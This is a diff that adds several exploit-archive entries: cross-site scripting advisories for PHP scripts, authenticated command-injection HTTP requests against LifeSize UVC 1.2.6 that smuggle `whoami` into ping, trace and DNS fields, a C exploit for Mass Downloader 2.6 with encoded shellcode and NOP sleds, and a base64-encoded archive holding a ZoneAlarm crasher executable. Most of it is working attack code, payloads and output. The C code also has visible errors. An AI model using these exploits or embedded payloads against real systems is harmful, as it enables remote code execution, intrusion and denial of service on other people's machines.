--- a/platforms/php/webapps/32432.txt
+++ b/platforms/php/webapps/32432.txt
@ -0,0 +1,10 @@
 source: http://www.securityfocus.com/bid/31438/info
 Clickbank Portal is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
 The following example is available:
 http://www.example.com/search.php
 in search box code Xss 
--- a/platforms/php/webapps/32433.txt
+++ b/platforms/php/webapps/32433.txt
@ -0,0 +1,10 @@
 source: http://www.securityfocus.com/bid/31441/info
 Membership Script is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
 http://www.example.com/stuffs.php?category= XSS_CODE
 http://www.example.com/search.php
 in search box code Xss 
--- a/platforms/php/webapps/32434.txt
+++ b/platforms/php/webapps/32434.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/31442/info
 Recipe Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
 http://www.example.com/search.php?keyword= XSS_HACKING 
--- a/platforms/php/webapps/32437.txt
+++ b/platforms/php/webapps/32437.txt
@ -0,0 +1,82 @@
 LifeSize UVC 1.2.6 authenticated vulnerabilities
 RCE as www-data:
 POST /server-admin/operations/diagnose/ping/ HTTP/1.1
 Host: 172.31.16.99
 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: https://172.31.16.99/server-admin/operations/diagnose/ping/
 Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161fb19e9f45da579
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 118
 csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=goo`whoami`gle.com
 The above POST results in a response containing:
 <span class="red_txt">ping: unknown host goowww-datagle.com</span><br/>
 RCE as www-data:
 POST /server-admin/operations/diagnose/trace/ HTTP/1.1
 Host: 172.31.16.99
 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: https://172.31.16.99/server-admin/operations/diagnose/trace/
 Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161fb19e9f45da579
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 101
 csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=go`whoami`ogle.com
 Results in the following error:
 gowww-dataogle.com: Name or service not known
 RCE as www-data:
 POST /server-admin/operations/diagnose/dns/ HTTP/1.1
 Host: 172.31.16.99
 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: https://172.31.16.99/server-admin/operations/diagnose/dns/
 Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161fb19e9f45da579
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 116
 csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=go`whoami`ogle.com&query_type=ANY
 Results in the following results:
 ; <<>> DiG 9.7.0-P1 <<>> -t ANY gowww-dataogle.com -b 172.31.16.99
 ;; global options: +cmd
 ;; Got answer:
 ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 54663
 ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
 ;; QUESTION SECTION:
 ;gowww-dataogle.com. IN ANY
 ;; AUTHORITY SECTION:
 com. 890 IN SOA a.gtld-servers.net. nstld.verisign-grs.com. 1395411948 1800 900 604800 86400
 ;; Query time: 21 msec
 ;; SERVER: 8.8.8.8#53(8.8.8.8)
 ;; WHEN: Fri Mar 21 10:26:21 2014
 ;; MSG SIZE rcvd: 109
--- a/platforms/windows/dos/32420.c
+++ b/platforms/windows/dos/32420.c
@ -0,0 +1,163 @@
 source: http://www.securityfocus.com/bid/31406/info
 Mass Downloader is prone to a remote denial-of-service vulnerability.
 Exploiting this issue allows remote attackers to crash the application and trigger denial-of-service conditions, denying further service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
 Mass Downloader 2.6 is vulnerable; other versions may also be affected. 
 #include<windows.h>
 #include <sys/types.h>
 #include <sys/socket.h>
 #include <netinet/in.h>
 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 #include <unistd.h>
 #include <errno.h>
 #include <netdb.h>
 unsigned char bind_scode[] =
               "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
                "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
                "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
                "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
                "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
                "\x42\x30\x42\x50\x42\x50\x4b\x58\x45\x54\x4e\x53\x4b\x58\x4e\x37"
                "\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x48"
                "\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x43\x4b\x38"
                "\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
                "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
                "\x46\x4f\x4b\x53\x46\x35\x46\x32\x46\x30\x45\x37\x45\x4e\x4b\x48"
                "\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54"
                "\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x38"
                "\x41\x30\x4b\x4e\x49\x58\x4e\x35\x46\x42\x46\x50\x43\x4c\x41\x43"
                "\x42\x4c\x46\x36\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x37"
                "\x4e\x30\x4b\x48\x42\x34\x4e\x50\x4b\x48\x42\x57\x4e\x31\x4d\x4a"
                "\x4b\x38\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x42\x38\x42\x4b"
                "\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x35\x41\x33"
                "\x48\x4f\x42\x46\x48\x35\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
                "\x42\x55\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x35\x4a\x46\x4a\x49"
                "\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x36"
                "\x4e\x46\x43\x46\x50\x52\x45\x36\x4a\x37\x45\x36\x42\x30\x5a\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
 unsigned char user_scode[] =
               "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
                "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
                "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
                "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
                "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
                "\x42\x30\x42\x50\x42\x50\x4b\x58\x45\x54\x4e\x53\x4b\x58\x4e\x37"
                "\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x48"
                "\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x43\x4b\x38"
                "\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
                "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
                "\x46\x4f\x4b\x53\x46\x35\x46\x32\x46\x30\x45\x37\x45\x4e\x4b\x48"
                "\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54"
                "\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x38"
                "\x41\x30\x4b\x4e\x49\x58\x4e\x35\x46\x42\x46\x50\x43\x4c\x41\x43"
                "\x42\x4c\x46\x36\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x37"
                "\x4e\x30\x4b\x48\x42\x34\x4e\x50\x4b\x48\x42\x57\x4e\x31\x4d\x4a"
                "\x4b\x38\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x42\x38\x42\x4b"
                "\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x35\x41\x33"
                "\x48\x4f\x42\x46\x48\x35\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
                "\x42\x55\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x35\x4a\x46\x4a\x49"
                "\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x36"
                "\x4e\x46\x43\x46\x50\x52\x45\x36\x4a\x37\x45\x36\x42\x30\x5a"
 unsigned char ra_sp2[] = "\xFF\xBE\x3F\x7E"; //massdown.dll
 unsigned char ra_sp3[] = "\x7B\x30\xE4\x77"; //massdown.dll
 unsigned char nops1[12]; //14115 * \x90
 unsigned char nops2[2068]; //2068 * \x90
 int main(int argc, char **argv)
 {
    int i;
    FILE* f;
    char* ra=NULL;
    char* scode=NULL;
    printf("[+] Mass Downloader 2.6 Remote Denial of Service PoC \n");
        printf("[+] Discovered by Ciph3r  <www.expl0iters.ir>\n");
        printf("[+] Code by Ciph3r Ciph3r_blackhat[at]yahoo[dot]com\n");
    if ((argc!=3)||((atoi(argv[1])!=0)&&(atoi(argv[1])!=1))||((atoi(argv[2])!=0)&&(atoi(argv[2])!=1))){
            printf("Usage: %s target Ciph3r\n",argv[0]);
            printf("Where target is:\n");
            printf("0: winXP Pro SP2\n");
            printf("1: win2k\n")
            return EXIT_SUCCESS;
    }
 for(i=0;i<12;i++) nops1[i]='\x90';
    nops1[12]='\0';
    for(i=0;i<2068;i++) nops2[i]='\x90';
    nops2[2068]='\0';
    if(atoi(argv[1])==0) ra=ra_sp2;
    else ra=ra_sp3;
    if(atoi(argv[2])==0) scode=bind_scode;
    else scode=user_scode;
    f=fopen("Ciph3r.exe","wb");
    fprintf(f,nops1,ra,nops2,scode,'\xd','\xa');
    fflush(f);
    fclose(f);
    printf("Ciph3r.exe created!\n");
    return EXIT_SUCCESS;
 }
--- a/platforms/windows/dos/32428.txt
+++ b/platforms/windows/dos/32428.txt
@ -0,0 +1,126 @@
 source: http://www.securityfocus.com/bid/31431/info
 ZoneAlarm Internet Security Suite is prone to a remote denial-of-service vulnerability that occurs in the TrueVector component when connecting to a malicious HTTP proxy.
 ZoneAlarm Internet Security Suite 8.0.020 is vulnerable; other versions may also be affected.
 za_crasher_proxy.b64 (Base64 Encoded File)
 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
